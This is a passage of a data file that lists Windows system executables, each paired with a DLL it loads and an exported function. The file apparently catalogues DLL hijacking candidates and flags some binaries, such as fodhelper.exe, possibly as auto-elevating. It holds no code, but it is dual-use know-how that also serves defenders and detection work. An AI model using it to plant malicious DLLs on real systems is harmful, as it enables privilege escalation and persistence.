1071 | FALSE,"setupugc.exe","WDSCORE.dll","WdsSetupLogDestroy"
1072 | FALSE,"setupugc.exe","WDSCORE.dll","WdsSetupLogInit"
1073 | FALSE,"setupugc.exe","WDSCORE.dll","WdsSetupLogMessageW"
1074 | FALSE,"shutdown.exe","SspiCli.dll","DllMain"
1075 | FALSE,"slidetoshutdown.exe","d3d10warp.dll","DllMain"
1076 | FALSE,"slidetoshutdown.exe","d3d10warp.dll","OpenAdapter10_2"
1077 | FALSE,"slui.exe","CLDAPI.dll","CfGetPlaceholderStateFromAttributeTag"
1078 | FALSE,"slui.exe","CLDAPI.dll","DllMain"
1079 | FALSE,"slui.exe","CRYPTBASE.DLL","DllMain"
1080 | FALSE,"slui.exe","edputil.dll","DllMain"
1081 | FALSE,"slui.exe","edputil.dll","EdpGetIsManaged"
1082 | FALSE,"slui.exe","FLTLIB.DLL","DllMain"
1083 | FALSE,"slui.exe","PROPSYS.dll","DllMain"
1084 | FALSE,"slui.exe","PROPSYS.dll","PSCreateMemoryPropertyStore"
1085 | FALSE,"slui.exe","PROPSYS.dll","PSPropertyBag_WriteDWORD"
1086 | FALSE,"slui.exe","sppc.dll","DllMain"
1087 | FALSE,"slui.exe","WINBRAND.dll","DllMain"
1088 | FALSE,"slui.exe","WTSAPI32.dll","DllMain"
1089 | FALSE,"spaceagent.exe","NETUTILS.DLL","DllMain"
1090 | FALSE,"spaceagent.exe","SRVCLI.DLL","DllMain"
1091 | FALSE,"spectrum.exe","SpectrumSyncClient.dll","DllMain"
1092 | FALSE,"spoolsv.exe","DNSAPI.dll","DllMain"
1093 | FALSE,"sppextcomobj.exe","adsldpc.dll","DllMain"
1094 | FALSE,"sppextcomobj.exe","CRYPTBASE.dll","DllMain"
1095 | FALSE,"sppextcomobj.exe","CRYPTBASE.dll","SystemFunction036"
1096 | FALSE,"sppextcomobj.exe","DNSAPI.dll","DllMain"
1097 | FALSE,"sppsvc.exe","CRYPTXML.dll","DllMain"
1098 | FALSE,"sppsvc.exe","webservices.dll","DllMain"
1099 | FALSE,"sppsvc.exe","XmlLite.dll","DllMain"
1100 | FALSE,"srtasks.exe","bcd.dll","DllMain"
1101 | FALSE,"srtasks.exe","ktmw32.dll","DllMain"
1102 | FALSE,"srtasks.exe","SPP.dll","DllMain"
1103 | FALSE,"srtasks.exe","SRCLIENT.dll","DllMain"
1104 | FALSE,"srtasks.exe","SRCORE.dll","DllMain"
1105 | FALSE,"srtasks.exe","VSSAPI.DLL","DllMain"
1106 | FALSE,"srtasks.exe","VssTrace.DLL","DllMain"
1107 | FALSE,"srtasks.exe","wer.dll","DllMain"
1108 | FALSE,"stordiag.exe","CRYPTBASE.dll","DllMain"
1109 | FALSE,"stordiag.exe","CRYPTBASE.dll","SystemFunction036"
1110 | FALSE,"synchost.exe","PROPSYS.dll","DllMain"
1111 | FALSE,"sysreseterr.exe","WDSCORE.dll","DllMain"
1112 | FALSE,"systeminfo.exe","SspiCli.dll","DllMain"
1113 | FALSE,"tabcal.exe","DEVOBJ.dll","DevObjCreateDeviceInfoList"
1114 | FALSE,"tabcal.exe","DEVOBJ.dll","DevObjDestroyDeviceInfoList"
1115 | FALSE,"tabcal.exe","DEVOBJ.dll","DevObjEnumDeviceInfo"
1116 | FALSE,"tabcal.exe","DEVOBJ.dll","DevObjEnumDeviceInterfaces"
1117 | FALSE,"tabcal.exe","DEVOBJ.dll","DevObjGetClassDevs"
1118 | FALSE,"tabcal.exe","DEVOBJ.dll","DevObjGetDeviceInfoListDetail"
1119 | FALSE,"tabcal.exe","DEVOBJ.dll","DevObjGetDeviceInterfaceDetail"
1120 | FALSE,"tabcal.exe","DEVOBJ.dll","DllMain"
1121 | FALSE,"tabcal.exe","HID.DLL","DllMain"
1122 | FALSE,"tabcal.exe","HID.DLL","HidD_GetHidGuid"
1123 | FALSE,"tabcal.exe","NInput.dll","DllMain"
1124 | FALSE,"takeown.exe","SspiCli.dll","DllMain"
1125 | FALSE,"tapiunattend.exe","WDSCORE.dll","ConstructPartialMsgVW"
1126 | FALSE,"tapiunattend.exe","WDSCORE.dll","CurrentIP"
1127 | FALSE,"tapiunattend.exe","WDSCORE.dll","DllMain"
1128 | FALSE,"tapiunattend.exe","WDSCORE.dll","WdsSetupLogMessageW"
1129 | FALSE,"tar.exe","archiveint.dll","archive_match_new"
1130 | FALSE,"tar.exe","archiveint.dll","DllMain"
1131 | FALSE,"taskkill.exe","dbghelp.dll","DllMain"
1132 | FALSE,"taskkill.exe","netutils.dll","DllMain"
1133 | FALSE,"taskkill.exe","srvcli.dll","DllMain"
1134 | FALSE,"taskkill.exe","SspiCli.dll","DllMain"
1135 | FALSE,"tasklist.exe","dbghelp.dll","DllMain"
1136 | FALSE,"tasklist.exe","netutils.dll","DllMain"
1137 | FALSE,"tasklist.exe","srvcli.dll","DllMain"
1138 | FALSE,"tasklist.exe","SspiCli.dll","DllMain"
1139 | FALSE,"tieringengineservice.exe","CLUSAPI.dll","DllMain"
1140 | FALSE,"tieringengineservice.exe","DNSAPI.dll","DllMain"
1141 | FALSE,"tieringengineservice.exe","ESENT.dll","DllMain"
1142 | FALSE,"tracert.exe","IPHLPAPI.DLL","DllMain"
1143 | FALSE,"tscon.exe","logoncli.dll","DllMain"
1144 | FALSE,"tscon.exe","netutils.dll","DllMain"
1145 | FALSE,"tscon.exe","samcli.dll","DllMain"
1146 | FALSE,"tscon.exe","srvcli.dll","DllMain"
1147 | FALSE,"tscon.exe","utildll.dll","DllMain"
1148 | FALSE,"tscon.exe","WINSTA.dll","DllMain"
1149 | FALSE,"tsdiscon.exe","WINSTA.dll","DllMain"
1150 | FALSE,"tsdiscon.exe","WINSTA.dll","WinStationNameFromLogonIdW"
1151 | FALSE,"tskill.exe","logoncli.dll","DllMain"
1152 | FALSE,"tskill.exe","netutils.dll","DllMain"
1153 | FALSE,"tskill.exe","samcli.dll","DllMain"
1154 | FALSE,"tskill.exe","srvcli.dll","DllMain"
1155 | FALSE,"tskill.exe","utildll.dll","DllMain"
1156 | FALSE,"tskill.exe","WINSTA.dll","DllMain"
1157 | FALSE,"tttracer.exe","TTDRecord.dll","DllMain"
1158 | FALSE,"tttracer.exe","USERENV.dll","DllMain"
1159 | FALSE,"typeperf.exe","pdh.dll","DllMain"
1160 | FALSE,"tzsync.exe","CRYPTBASE.dll","DllMain"
1161 | FALSE,"tzsync.exe","CRYPTBASE.dll","SystemFunction036"
1162 | FALSE,"uevappmonitor.exe","CRYPTBASE.dll","DllMain"
1163 | FALSE,"uevappmonitor.exe","CRYPTBASE.dll","SystemFunction036"
1164 | FALSE,"unlodctr.exe","loadperf.dll","DllMain"
1165 | FALSE,"upfc.exe","XmlLite.dll","DllMain"
1166 | FALSE,"upgraderesultsui.exe","DMCmnUtils.dll","DllMain"
1167 | FALSE,"useraccountcontrolsettings.exe","CRYPTBASE.dll","DllMain"
1168 | FALSE,"useraccountcontrolsettings.exe","CRYPTBASE.dll","SystemFunction036"
1169 | FALSE,"usocoreworker.exe","Cabinet.dll","DllMain"
1170 | FALSE,"usocoreworker.exe","DMCmnUtils.dll","DllMain"
1171 | FALSE,"usocoreworker.exe","dmiso8601utils.dll","DllMain"
1172 | FALSE,"usocoreworker.exe","DMOleAutUtils.dll","DllMain"
1173 | FALSE,"usocoreworker.exe","iri.dll","DllMain"
1174 | FALSE,"usocoreworker.exe","omadmapi.dll","DllMain"
1175 | FALSE,"usocoreworker.exe","UpdatePolicy.dll","DllMain"
1176 | FALSE,"usocoreworker.exe","XmlLite.dll","DllMain"
1177 | FALSE,"utcdecoderhost.exe","USERENV.dll","DllMain"
1178 | FALSE,"utilman.exe","OLEACC.dll","DllMain"
1179 | FALSE,"vaultcmd.exe","VAULTCLI.dll","DllMain"
1180 | FALSE,"vds.exe","ATL.DLL","AtlModuleInit"
1181 | FALSE,"vds.exe","ATL.DLL","AtlModuleTerm"
1182 | FALSE,"vds.exe","ATL.DLL","DllMain"
1183 | FALSE,"vds.exe","bcd.dll","DllMain"
1184 | FALSE,"vds.exe","OSUNINST.dll","DllMain"
1185 | FALSE,"vdsldr.exe","ATL.DLL","AtlModuleInit"
1186 | FALSE,"vdsldr.exe","ATL.DLL","AtlModuleRegisterClassObjects"
1187 | FALSE,"vdsldr.exe","ATL.DLL","DllMain"
1188 | FALSE,"vdsldr.exe","bcd.dll","DllMain"
1189 | FALSE,"vssadmin.exe","ATL.DLL","DllMain"
1190 | FALSE,"vssadmin.exe","VSSAPI.DLL","DllMain"
1191 | FALSE,"vssadmin.exe","VssTrace.DLL","DllMain"
1192 | FALSE,"vssadmin.exe","VssTrace.DLL","VssGetTracingContextPerThread"
1193 | FALSE,"vssadmin.exe","VssTrace.DLL","VssIsTracingEnabled"
1194 | FALSE,"vssadmin.exe","VssTrace.DLL","VssSetTracingContextPerThread"
1195 | FALSE,"vssadmin.exe","VssTrace.DLL","VssTraceInitialize"
1196 | FALSE,"vssadmin.exe","VssTrace.DLL","VssTraceUninitialize"
1197 | FALSE,"vssvc.exe","AUTHZ.dll","DllMain"
1198 | FALSE,"vssvc.exe","bcd.dll","DllMain"
1199 | FALSE,"vssvc.exe","DEVOBJ.dll","DllMain"
1200 | FALSE,"vssvc.exe","FLTLIB.DLL","DllMain"
1201 | FALSE,"vssvc.exe","VirtDisk.dll","DllMain"
1202 | FALSE,"vssvc.exe","VSSAPI.DLL","DllMain"
1203 | FALSE,"vssvc.exe","VssTrace.DLL","DllMain"
1204 | FALSE,"vssvc.exe","VssTrace.DLL","VssGetTracingContextPerThread"
1205 | FALSE,"vssvc.exe","VssTrace.DLL","VssIsTracingEnabled"
1206 | FALSE,"vssvc.exe","VssTrace.DLL","VssSetTracingContextPerThread"
1207 | FALSE,"vssvc.exe","VssTrace.DLL","VssTraceInitialize"
1208 | FALSE,"vssvc.exe","VssTrace.DLL","VssTraceUninitialize"
1209 | FALSE,"w32tm.exe","IPHLPAPI.DLL","DllMain"
1210 | FALSE,"w32tm.exe","logoncli.dll","DllMain"
1211 | FALSE,"w32tm.exe","netutils.dll","DllMain"
1212 | FALSE,"w32tm.exe","NTDSAPI.dll","DllMain"
1213 | FALSE,"waitfor.exe","netutils.dll","DllMain"
1214 | FALSE,"waitfor.exe","srvcli.dll","DllMain"
1215 | FALSE,"waitfor.exe","SspiCli.dll","DllMain"
1216 | FALSE,"wbadmin.exe","credui.dll","DllMain"
1217 | FALSE,"wbengine.exe","bcd.dll","DllMain"
1218 | FALSE,"wbengine.exe","CLUSAPI.dll","DllMain"
1219 | FALSE,"wbengine.exe","DNSAPI.dll","DllMain"
1220 | FALSE,"wbengine.exe","FLTLIB.DLL","DllMain"
1221 | FALSE,"wbengine.exe","NETUTILS.DLL","DllMain"
1222 | FALSE,"wbengine.exe","SPP.dll","DllMain"
1223 | FALSE,"wbengine.exe","SRVCLI.DLL","DllMain"
1224 | FALSE,"wbengine.exe","VirtDisk.dll","DllMain"
1225 | FALSE,"wbengine.exe","VSSAPI.DLL","DllMain"
1226 | FALSE,"wbengine.exe","VssTrace.DLL","DllMain"
1227 | FALSE,"wbengine.exe","wer.dll","DllMain"
1228 | FALSE,"wbengine.exe","XmlLite.dll","DllMain"
1229 | FALSE,"wecutil.exe","WecApi.dll","DllMain"
1230 | FALSE,"wecutil.exe","wevtapi.dll","DllMain"
1231 | FALSE,"werfault.exe","dbgcore.DLL","DllMain"
1232 | FALSE,"werfault.exe","faultrep.dll","DllMain"
1233 | FALSE,"werfault.exe","wer.dll","DllMain"
1234 | FALSE,"werfault.exe","wer.dll","WerpSetExitListeners"
1235 | FALSE,"werfaultsecure.exe","dbgcore.DLL","DllMain"
1236 | FALSE,"werfaultsecure.exe","faultrep.dll","DllMain"
1237 | FALSE,"werfaultsecure.exe","wer.dll","DllMain"
1238 | FALSE,"werfaultsecure.exe","wer.dll","WerpSetExitListeners"
1239 | FALSE,"wermgr.exe","wer.dll","DllMain"
1240 | FALSE,"wermgr.exe","wer.dll","WerpSetExitListeners"
1241 | FALSE,"wextract.exe","Cabinet.dll","DllMain"
1242 | FALSE,"wfs.exe","ATL.DLL","DllMain"
1243 | FALSE,"wfs.exe","credui.dll","DllMain"
1244 | FALSE,"wfs.exe","IPHLPAPI.DLL","DllMain"
1245 | FALSE,"wfs.exe","PROPSYS.dll","DllMain"
1246 | FALSE,"wfs.exe","UxTheme.dll","DllMain"
1247 | FALSE,"whoami.exe","AUTHZ.dll","DllMain"
1248 | FALSE,"whoami.exe","netutils.dll","DllMain"
1249 | FALSE,"whoami.exe","SspiCli.dll","DllMain"
1250 | FALSE,"whoami.exe","wkscli.dll","DllMain"
1251 | FALSE,"wiaacmgr.exe","ScanSetting.DLL","DllMain"
1252 | FALSE,"wiaacmgr.exe","UxTheme.dll","DllMain"
1253 | FALSE,"wiawow64.exe","ScanSetting.DLL","DllMain"
1254 | FALSE,"wiawow64.exe","UxTheme.dll","DllMain"
1255 | FALSE,"wifitask.exe","HTTPAPI.dll","DllMain"
1256 | FALSE,"wifitask.exe","IPHLPAPI.DLL","DllMain"
1257 | FALSE,"wifitask.exe","webservices.dll","DllMain"
1258 | FALSE,"wifitask.exe","wlanapi.dll","DllMain"
1259 | FALSE,"wimserv.exe","Cabinet.dll","DllMain"
1260 | FALSE,"winlogon.exe","UXINIT.dll","DllMain"
1261 | FALSE,"winlogon.exe","UXINIT.dll","ThemesOnTerminateSession"
1262 | FALSE,"winrs.exe","DSROLE.dll","DllMain"
1263 | FALSE,"winrs.exe","mi.dll","DllMain"
1264 | FALSE,"winrs.exe","miutils.dll","DllMain"
1265 | FALSE,"wkspbroker.exe","credui.dll","DllMain"
1266 | FALSE,"wkspbroker.exe","DNSAPI.dll","DllMain"
1267 | FALSE,"wkspbroker.exe","ktmw32.dll","DllMain"
1268 | FALSE,"wkspbroker.exe","PROPSYS.dll","DllMain"
1269 | FALSE,"wkspbroker.exe","RADCUI.dll","DllMain"
1270 | FALSE,"wkspbroker.exe","SspiCli.dll","DllMain"
1271 | FALSE,"wkspbroker.exe","tsworkspace.dll","DllMain"
1272 | FALSE,"wkspbroker.exe","WINHTTP.dll","DllMain"
1273 | FALSE,"wkspbroker.exe","WININET.dll","DllMain"
1274 | FALSE,"wksprt.exe","webservices.dll","DllMain"
1275 | FALSE,"wksprt.exe","WININET.dll","DllMain"
1276 | FALSE,"wlrmdr.exe","SspiCli.dll","DllMain"
1277 | FALSE,"wmpdmc.exe","dwmapi.dll","DllMain"
1278 | FALSE,"wmpdmc.exe","OLEACC.dll","DllMain"
1279 | FALSE,"wmpdmc.exe","UxTheme.dll","DllMain"
1280 | FALSE,"wmpdmc.exe","WindowsCodecs.dll","DllMain"
1281 | FALSE,"wmpdmc.exe","wmpdui.dll","DllMain"
1282 | FALSE,"workfolders.exe","CLDAPI.dll","CfGetPlaceholderStateFromAttributeTag"
1283 | FALSE,"workfolders.exe","CLDAPI.dll","DllMain"
1284 | FALSE,"workfolders.exe","CRYPTBASE.DLL","DllMain"
1285 | FALSE,"workfolders.exe","DEVOBJ.dll","DllMain"
1286 | FALSE,"workfolders.exe","dmEnrollEngine.DLL","DllMain"
1287 | FALSE,"workfolders.exe","edputil.dll","DllMain"
1288 | FALSE,"workfolders.exe","edputil.dll","EdpGetIsManaged"
1289 | FALSE,"workfolders.exe","FLTLIB.DLL","DllMain"
1290 | FALSE,"workfolders.exe","policymanager.dll","DllMain"
1291 | FALSE,"workfolders.exe","PROPSYS.dll","DllMain"
1292 | FALSE,"workfolders.exe","PROPSYS.dll","PSCreateMemoryPropertyStore"
1293 | FALSE,"workfolders.exe","PROPSYS.dll","PSPropertyBag_WriteDWORD"
1294 | FALSE,"workfolders.exe","USERENV.dll","DllMain"
1295 | FALSE,"workfolders.exe","USERENV.dll","GetProfileType"
1296 | FALSE,"wowreg32.exe","devrtl.DLL","DllMain"
1297 | FALSE,"wpcmon.exe","samcli.dll","DllMain"
1298 | FALSE,"wpcmon.exe","USERENV.dll","DllMain"
1299 | FALSE,"wpnpinst.exe","Cabinet.dll","DllMain"
1300 | FALSE,"wpnpinst.exe","IPHLPAPI.DLL","DllMain"
1301 | FALSE,"wpnpinst.exe","PROPSYS.dll","DllMain"
1302 | FALSE,"wpr.exe","WindowsPerformanceRecorderControl.dll","DllMain"
1303 | FALSE,"write.exe","CLDAPI.dll","CfGetPlaceholderStateFromAttributeTag"
1304 | FALSE,"write.exe","CLDAPI.dll","DllMain"
1305 | FALSE,"write.exe","CRYPTBASE.DLL","DllMain"
1306 | FALSE,"write.exe","edputil.dll","DllMain"
1307 | FALSE,"write.exe","edputil.dll","EdpGetIsManaged"
1308 | FALSE,"write.exe","FLTLIB.DLL","DllMain"
1309 | FALSE,"write.exe","PROPSYS.dll","DllMain"
1310 | FALSE,"write.exe","PROPSYS.dll","PSCreateMemoryPropertyStore"
1311 | FALSE,"write.exe","PROPSYS.dll","PSPropertyBag_WriteDWORD"
1312 | FALSE,"wscadminui.exe","CRYPTBASE.DLL","DllMain"
1313 | FALSE,"wsmanhttpconfig.exe","DSROLE.dll","DllMain"
1314 | FALSE,"wsmanhttpconfig.exe","HTTPAPI.dll","DllMain"
1315 | FALSE,"wsmanhttpconfig.exe","HTTPAPI.dll","HttpInitialize"
1316 | FALSE,"wsmanhttpconfig.exe","HTTPAPI.dll","HttpTerminate"
1317 | FALSE,"wsmanhttpconfig.exe","mi.dll","DllMain"
1318 | FALSE,"wsmanhttpconfig.exe","miutils.dll","DllMain"
1319 | FALSE,"wsmprovhost.exe","DSROLE.dll","DllMain"
1320 | FALSE,"wsmprovhost.exe","mi.dll","DllMain"
1321 | FALSE,"wsmprovhost.exe","miutils.dll","DllMain"
1322 | TRUE,"bthudtask.exe","DEVOBJ.dll","DllMain"
1323 | TRUE,"computerdefaults.exe","CRYPTBASE.DLL","DllMain"
1324 | TRUE,"computerdefaults.exe","edputil.dll","DllMain"
1325 | TRUE,"computerdefaults.exe","edputil.dll","EdpGetIsManaged"
1326 | TRUE,"computerdefaults.exe","iertutil.dll","DllMain"
1327 | TRUE,"computerdefaults.exe","MLANG.dll","ConvertINetUnicodeToMultiByte"
1328 | TRUE,"computerdefaults.exe","MLANG.dll","DllMain"
1329 | TRUE,"computerdefaults.exe","PROPSYS.dll","DllMain"
1330 | TRUE,"computerdefaults.exe","PROPSYS.dll","PSCreateMemoryPropertyStore"
1331 | TRUE,"computerdefaults.exe","PROPSYS.dll","PSPropertyBag_WriteDWORD"
1332 | TRUE,"computerdefaults.exe","Secur32.dll","DllMain"
1333 | TRUE,"computerdefaults.exe","srvcli.dll","DllMain"
1334 | TRUE,"computerdefaults.exe","SSPICLI.DLL","DllMain"
1335 | TRUE,"computerdefaults.exe","SSPICLI.DLL","GetUserNameExW"
1336 | TRUE,"computerdefaults.exe","urlmon.dll","DllMain"
1337 | TRUE,"computerdefaults.exe","WININET.dll","DllMain"
1338 | TRUE,"computerdefaults.exe","WININET.dll","GetUrlCacheEntryBinaryBlob"
1339 | TRUE,"computerdefaults.exe","Wldp.dll","DllMain"
1340 | TRUE,"dccw.exe","ColorAdapterClient.dll","DllMain"
1341 | TRUE,"dccw.exe","dxva2.dll","DllMain"
1342 | TRUE,"dccw.exe","mscms.dll","DccwReleaseDisplayProfileAssociationList"
1343 | TRUE,"dccw.exe","mscms.dll","DllMain"
1344 | TRUE,"dccw.exe","mscms.dll","WcsGetCalibrationManagementState"
1345 | TRUE,"dccw.exe","mscms.dll","WcsSetCalibrationManagementState"
1346 | TRUE,"dccw.exe","USERENV.dll","DllMain"
1347 | TRUE,"djoin.exe","JOINUTIL.DLL","DllMain"
1348 | TRUE,"djoin.exe","logoncli.dll","DllMain"
1349 | TRUE,"djoin.exe","netprovfw.dll","DllMain"
1350 | TRUE,"djoin.exe","netutils.dll","DllMain"
1351 | TRUE,"djoin.exe","wdscore.dll","DllMain"
1352 | TRUE,"djoin.exe","wkscli.dll","DllMain"
1353 | TRUE,"easinvoker.exe","AUTHZ.dll","DllMain"
1354 | TRUE,"easinvoker.exe","netutils.dll","DllMain"
1355 | TRUE,"easinvoker.exe","samcli.dll","DllMain"
1356 | TRUE,"easinvoker.exe","SAMLIB.dll","DllMain"
1357 | TRUE,"easpolicymanagerbrokerhost.exe","InprocLogger.dll","DllMain"
1358 | TRUE,"easpolicymanagerbrokerhost.exe","InprocLogger.dll","FlushInProcTraceSession"
1359 | TRUE,"easpolicymanagerbrokerhost.exe","InprocLogger.dll","InitializeInProcLogger"
1360 | TRUE,"easpolicymanagerbrokerhost.exe","InprocLogger.dll","InitializeInProcTraceFlushTrigger"
1361 | TRUE,"easpolicymanagerbrokerhost.exe","InprocLogger.dll","InitializeInProcTraceSession"
1362 | TRUE,"easpolicymanagerbrokerhost.exe","InprocLogger.dll","ShutdownInProcLogger"
1363 | TRUE,"easpolicymanagerbrokerhost.exe","InprocLogger.dll","ShutdownInProcTraceSession"
1364 | TRUE,"easpolicymanagerbrokerhost.exe","InprocLogger.dll","StopInProcTraceSession"
1365 | TRUE,"easpolicymanagerbrokerhost.exe","msvcp110_win.dll","DllMain"
1366 | TRUE,"easpolicymanagerbrokerhost.exe","policymanager.dll","DllMain"
1367 | TRUE,"easpolicymanagerbrokerhost.exe","UMPDC.dll","DllMain"
1368 | TRUE,"fodhelper.exe","CRYPTBASE.DLL","DllMain"
1369 | TRUE,"fodhelper.exe","edputil.dll","DllMain"
1370 | TRUE,"fodhelper.exe","edputil.dll","EdpGetIsManaged"
1371 | TRUE,"fodhelper.exe","iertutil.dll","DllMain"
1372 | TRUE,"fodhelper.exe","MLANG.dll","ConvertINetUnicodeToMultiByte"
1373 | TRUE,"fodhelper.exe","MLANG.dll","DllMain"
1374 | TRUE,"fodhelper.exe","netutils.dll","DllMain"
1375 | TRUE,"fodhelper.exe","PROPSYS.dll","DllMain"
1376 | TRUE,"fodhelper.exe","PROPSYS.dll","PSCreateMemoryPropertyStore"
1377 | TRUE,"fodhelper.exe","PROPSYS.dll","PSPropertyBag_WriteDWORD"
1378 | TRUE,"fodhelper.exe","Secur32.dll","DllMain"
1379 | TRUE,"fodhelper.exe","srvcli.dll","DllMain"
1380 | TRUE,"fodhelper.exe","SSPICLI.DLL","DllMain"
1381 | TRUE,"fodhelper.exe","SSPICLI.DLL","GetUserNameExW"
1382 | TRUE,"fodhelper.exe","urlmon.dll","DllMain"
1383 | TRUE,"fodhelper.exe","WININET.dll","DllMain"
1384 | TRUE,"fodhelper.exe","WININET.dll","GetUrlCacheEntryBinaryBlob"
1385 | TRUE,"fodhelper.exe","Wldp.dll","DllMain"
1386 | TRUE,"fsavailux.exe","DEVOBJ.dll","DllMain"
1387 | TRUE,"fsavailux.exe","IfsUtil.dll","DllMain"
1388 | TRUE,"fsavailux.exe","ulib.dll","DllMain"
1389 | TRUE,"fsquirt.exe","DEVOBJ.dll","DllMain"
1390 | TRUE,"fsquirt.exe","DUser.dll","DllMain"
1391 | TRUE,"fsquirt.exe","MSWSOCK.dll","DllMain"
1392 | TRUE,"fsquirt.exe","OLEACC.dll","DllMain"
1393 | TRUE,"fsquirt.exe","OLEACCRC.DLL","DllMain"
1394 | TRUE,"fsquirt.exe","POWRPROF.dll","DllMain"
1395 | TRUE,"fsquirt.exe","TextShaping.dll","DllMain"
1396 | TRUE,"fsquirt.exe","UMPDC.dll","DllMain"
1397 | TRUE,"fxsunatd.exe","FXSAPI.dll","DllMain"
1398 | TRUE,"fxsunatd.exe","FXSAPI.dll","FaxConnectFaxServerW"
1399 | TRUE,"fxsunatd.exe","IPHLPAPI.DLL","DllMain"
1400 | TRUE,"fxsunatd.exe","PROPSYS.dll","DllMain"
1401 | TRUE,"fxsunatd.exe","slc.dll","DllMain"
1402 | TRUE,"fxsunatd.exe","sppc.dll","DllMain"
1403 | TRUE,"fxsunatd.exe","VERSION.dll","DllMain"
1404 | TRUE,"immersivetpmvscmgrsvr.exe","DEVOBJ.dll","DllMain"
1405 | TRUE,"immersivetpmvscmgrsvr.exe","profapi.dll","DllMain"
1406 | TRUE,"immersivetpmvscmgrsvr.exe","WinSCard.dll","DllMain"
1407 | TRUE,"iscsicli.exe","DEVOBJ.dll","DllMain"
1408 | TRUE,"iscsicli.exe","ISCSIDSC.dll","DllMain"
1409 | TRUE,"iscsicli.exe","ISCSIDSC.dll","GetIScsiVersionInformation"
1410 | TRUE,"iscsicli.exe","ISCSIUM.dll","DiscpAllocMemory"
1411 | TRUE,"iscsicli.exe","ISCSIUM.dll","DiscpRegisterHeap"
1412 | TRUE,"iscsicli.exe","ISCSIUM.dll","DllMain"
1413 | TRUE,"iscsicli.exe","WMICLNT.dll","DllMain"
1414 | TRUE,"lpksetup.exe","dpx.dll","DllMain"
1415 | TRUE,"mdsched.exe","bcd.dll","DllMain"
1416 | TRUE,"mschedexe.exe","MaintenanceUI.dll","DllMain"
1417 | TRUE,"msconfig.exe","ATL.DLL","AtlModuleInit"
1418 | TRUE,"msconfig.exe","ATL.DLL","AtlModuleRegisterClassObjects"
1419 | TRUE,"msconfig.exe","ATL.DLL","DllMain"
1420 | TRUE,"msconfig.exe","bcd.dll","DllMain"
1421 | TRUE,"msconfig.exe","MFC42u.dll","DllMain"
1422 | TRUE,"msconfig.exe","VERSION.dll","DllMain"
1423 | TRUE,"msdt.exe","ATL.DLL","DllMain"
1424 | TRUE,"msdt.exe","Cabinet.dll","DllMain"
1425 | TRUE,"msdt.exe","DUI70.dll","DllMain"
1426 | TRUE,"msdt.exe","DUser.dll","DllMain"
1427 | TRUE,"msdt.exe","Secur32.dll","DllMain"
1428 | TRUE,"msdt.exe","SSPICLI.DLL","DllMain"
1429 | TRUE,"msdt.exe","UxTheme.dll","DllMain"
1430 | TRUE,"msdt.exe","wer.dll","DllMain"
1431 | TRUE,"msdt.exe","WINHTTP.dll","DllMain"
1432 | TRUE,"msra.exe","IPHLPAPI.DLL","DllMain"
1433 | TRUE,"msra.exe","NDFAPI.DLL","DllMain"
1434 | TRUE,"msra.exe","SspiCli.dll","DllMain"
1435 | TRUE,"msra.exe","USERENV.dll","DllMain"
1436 | TRUE,"msra.exe","UxTheme.dll","DllMain"
1437 | TRUE,"msra.exe","wdi.dll","DllMain"
1438 | TRUE,"multidigimon.exe","NInput.dll","DllMain"
1439 | TRUE,"netplwiz.exe","CRYPTBASE.dll","DllMain"
1440 | TRUE,"netplwiz.exe","DSROLE.dll","DllMain"
1441 | TRUE,"netplwiz.exe","DSROLE.dll","DsRoleGetPrimaryDomainInformation"
1442 | TRUE,"netplwiz.exe","MPR.dll","DllMain"
1443 | TRUE,"netplwiz.exe","NETPLWIZ.dll","DllMain"
1444 | TRUE,"netplwiz.exe","NETPLWIZ.dll","UsersRunDllW"
1445 | TRUE,"netplwiz.exe","netutils.dll","DllMain"
1446 | TRUE,"netplwiz.exe","netutils.dll","NetApiBufferFree"
1447 | TRUE,"netplwiz.exe","PROPSYS.dll","DllMain"
1448 | TRUE,"netplwiz.exe","samcli.dll","DllMain"
1449 | TRUE,"netplwiz.exe","samcli.dll","NetUserGetInfo"
1450 | TRUE,"netplwiz.exe","SAMLIB.dll","DllMain"
1451 | TRUE,"netplwiz.exe","SAMLIB.dll","SamConnect"
1452 | TRUE,"netplwiz.exe","SAMLIB.dll","SamEnumerateDomainsInSamServer"
1453 | TRUE,"netplwiz.exe","SAMLIB.dll","SamFreeMemory"
1454 | TRUE,"optionalfeatures.exe","DUI70.dll","DllMain"
1455 | TRUE,"optionalfeatures.exe","DUI70.dll","InitProcessPriv"
1456 | TRUE,"optionalfeatures.exe","DUI70.dll","RegisterBaseControls"
1457 | TRUE,"optionalfeatures.exe","DUI70.dll","RegisterCommonControls"
1458 | TRUE,"optionalfeatures.exe","DUI70.dll","RegisterExtendedControls"
1459 | TRUE,"optionalfeatures.exe","DUI70.dll","RegisterStandardControls"
1460 | TRUE,"optionalfeatures.exe","DUser.dll","DllMain"
1461 | TRUE,"optionalfeatures.exe","msi.dll","DllMain"
1462 | TRUE,"optionalfeatures.exe","OLEACC.dll","CreateStdAccessibleObject"
1463 | TRUE,"optionalfeatures.exe","OLEACC.dll","DllMain"
1464 | TRUE,"optionalfeatures.exe","OLEACC.dll","GetRoleTextW"
1465 | TRUE,"optionalfeatures.exe","osbaseln.dll","CloseOsBaseline"
1466 | TRUE,"optionalfeatures.exe","osbaseln.dll","DllMain"
1467 | TRUE,"optionalfeatures.exe","osbaseln.dll","OpenOsBaseline"
1468 | TRUE,"optionalfeatures.exe","PROPSYS.dll","DllMain"
1469 | TRUE,"perfmon.exe","ATL.DLL","DllMain"
1470 | TRUE,"perfmon.exe","credui.dll","DllMain"
1471 | TRUE,"perfmon.exe","SspiCli.dll","DllMain"
1472 | TRUE,"printui.exe","IPHLPAPI.DLL","DllMain"
1473 | TRUE,"printui.exe","printui.dll","DllMain"
1474 | TRUE,"printui.exe","printui.dll","PrintUIEntryW"
1475 | TRUE,"printui.exe","PROPSYS.dll","DllMain"
1476 | TRUE,"printui.exe","puiapi.dll","DllMain"
1477 | TRUE,"printui.exe","TextShaping.dll","DllMain"
1478 | TRUE,"recdisc.exe","bcd.dll","DllMain"
1479 | TRUE,"recdisc.exe","Cabinet.dll","DllMain"
1480 | TRUE,"recdisc.exe","ReAgent.dll","DllMain"
1481 | TRUE,"rstrui.exe","bcd.dll","DllMain"
1482 | TRUE,"rstrui.exe","ktmw32.dll","DllMain"
1483 | TRUE,"rstrui.exe","SPP.dll","DllMain"
1484 | TRUE,"rstrui.exe","SPP.dll","SxTracerGetThreadContextRetail"
1485 | TRUE,"rstrui.exe","SRCORE.dll","DllMain"
1486 | TRUE,"rstrui.exe","SRCORE.dll","SrFreeRestoreStatus"
1487 | TRUE,"rstrui.exe","VSSAPI.DLL","DllMain"
